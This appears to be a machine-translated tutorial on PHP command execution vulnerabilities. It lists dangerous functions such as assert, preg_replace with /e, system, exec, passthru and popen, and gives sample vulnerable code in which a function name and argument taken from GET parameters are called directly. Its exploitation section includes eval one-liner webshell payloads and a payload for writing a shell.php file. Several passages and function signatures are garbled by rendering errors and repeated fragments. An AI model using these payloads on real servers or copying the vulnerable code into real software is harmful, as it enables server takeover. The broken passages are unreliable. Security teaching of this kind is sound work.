Overview of Command Execution Vulnerabilities
- command execution definition
- command execution condition
- Cause of command execution
- The Harm of Command Execution Vulnerabilities
- Remote Command Execution Vulnerability Related Functions
- assert()
- preg_replace()
- call_user_func()
- a ( a( a ( b) mutable function
- Exploitation of Remote Command Execution Vulnerabilities
- System Command Execution Vulnerability Related Functions
command execution definition
- Basic definition: Command execution vulnerability means that an attacker can execute system commands at will, which can be divided into remote command execution (remote code execution) and system command execution.
- Principle: When a program is applied, it is sometimes necessary to call some functions that execute system commands, such as system, exec, shell_exec, passthru, popen, and proc_popen in PHP. When users can control the parameters of these functions, malicious system commands can be spliced into In normal commands, thus causing command execution attacks.
command execution condition
- User can control function input
- There are dangerous functions that can execute code or system commands
Cause of command execution
- Because the developer did not filter the executable special function entry in the code when writing the source code, the client could submit a maliciously constructed statement and submit it to the server for execution.
- During command injection attacks, the web server does not filter functions such as System, eval, and exec, which is the main reason for the success of vulnerability attacks.
The Harm of Command Execution Vulnerabilities
- Inherit the permissions of the web service program to execute system commands (arbitrary code) or read and write files
- Rebound Shell
- Control an entire website or even an entire server
- Further Intranet Penetration
Remote Command Execution Vulnerability Related Functions
assert()
Description: Check if the assertion is false
assert(mixed $assertion, Throwable $exception = ?): bool
Traditional assertion (PHP5 and 7)
**If assertion is a string, it will be executed as PHP code by assert(). **If a boolean condition is passed in as an assertion, this condition will not be displayed as a parameter of the assertion function; when calling the assert_options() processing function you defined, the condition will be converted to a string, and the boolean value false will be converted into an empty string.
Assert that this feature should only be used for debugging. Should be used for sanity checking to test whether a condition should always be true, to indicate some program error, or to check for the existence of specific functionality (like extension functions or specific system limitations and capabilities).
Simply put, assert is followed by a string, and it is treated as PHP code.
preg_replace()
preg_replace — Perform a regular expression search and replace
preg_replace(
string|array $pattern,
string|array $replacement,
string|array $subject,
int $limit = -1,
int &$count = null
): string|array|null
Search for the part matching pattern in subject and replace it with replacement.
preg_replace ( mixed $pattern , mixed $replacement , mixed $subject [,int $limit = -1 [,int count ] ] ) : mixed where pattern is the pattern to search for. Can be a string or an array of strings. When pattern has an "/e" modifier, count ]] ) : mixed where pattern is the pattern to search for. Can be a string or an array of strings. When the pattern has a "/e" modifier,count]]):mix e d where pattern is the pattern to search for . Can be a string or an array of strings. When there is a "/ e " modifier in p a tt er n , the replacement value will be executed as php code.
Now explain the specific usage of this function:
Simplify the model: preg_replace (O, A, HELLOWORLD), is to replace the O in the third parameter with A.
The "." in the first parameter in the code represents any character, "*" represents any number of times, and the two are connected to represent any string.
It is because of the addition of an /e that the second parameter will be executed as a php function at this time.
call_user_func()
call_user_func — call
call_user_func(callable callback , mixed . . . callback, mixed ... with the first argument as the callback functioncallback,mixed...args): mixed
a ( a( a ( b) mutable function
<?php
if(isset( $_GET['a' ])&isset($_GET['b'])){
@$a = $_GET['a'];
@$b = $_GET['b' ];
@$a($b);//函数,可变函数
//$a就是函数的名
//$b就是函数的值
//?a=assert&b=phpinfo()
//assert(phpinfo());
else{
echo "Please input a&b";
?>
That is, the former is used as the function name, and the latter parameters are used as the parameters of the function.
Exploitation of Remote Command Execution Vulnerabilities
?a=@eval( KaTeX parse error: Expected group after '_' at position 28: ...one sentence Trojan horse?a=print(_̲__FILE_); get the current absolute... _POST[1],$_POST[2])); 1 =shell.php&2=<?phpphpinfo()?>Write shell
***************************************************** ***************************************************** ***************************************************** *****Remote command execution The string we provide is php code, while the system command executes the string provided by the system command
System Command Execution Vulnerability Related Functions
- system()
- exec()
- shell_exec()
- passthru()
- popen()
- question mark
system()
exec()
(PHP 4, PHP 5, PHP 7, PHP 8)
exec — Execute an external program
Description :
exec(string KaTeX parse error: Expected 'EOF', got '&' at position 16: command, array &̲output = null, int &$result_code = null): string|false
exec() executes the given command.
shell_exec()
Description:
shell_exec(string $command): string|false|null
The parameter is the command to be executed.
passthru()
passthru ( string c o m m a n d [ , i n t s command [, int s command[,in t s return_var ] ) : void
Similar to the exec() function, the passthru() function is also used to execute external commands. When the executed Unix command outputs binary data and needs to be directly transmitted to the browser, this function needs to be used instead of the exec() or system() function. It is often used to execute commands that can directly output image streams such as pbmplus. By setting the Content-type to image/gif, and then calling the pbmplus program to output the gif file, you can directly output the image from the PHP script to the browser.
Parameters:
command: The command to execute.
return_var: If the return_var parameter is provided, the return status of the Unix command will be recorded to this parameter.
popen()
popen ( string $command , string $mode ) : resource
opens a pipe to the process spawned by the execution of the given command.
Parameter
command: command.
mode: mode.
<?php
if(isset($_GET['a'])){
popen( "whoami >>1.txt" , 'r');
}else{
echo "Please input a";
}
?>
Look at the greater-than sign in the code:
">:overwrite"
">>:append"
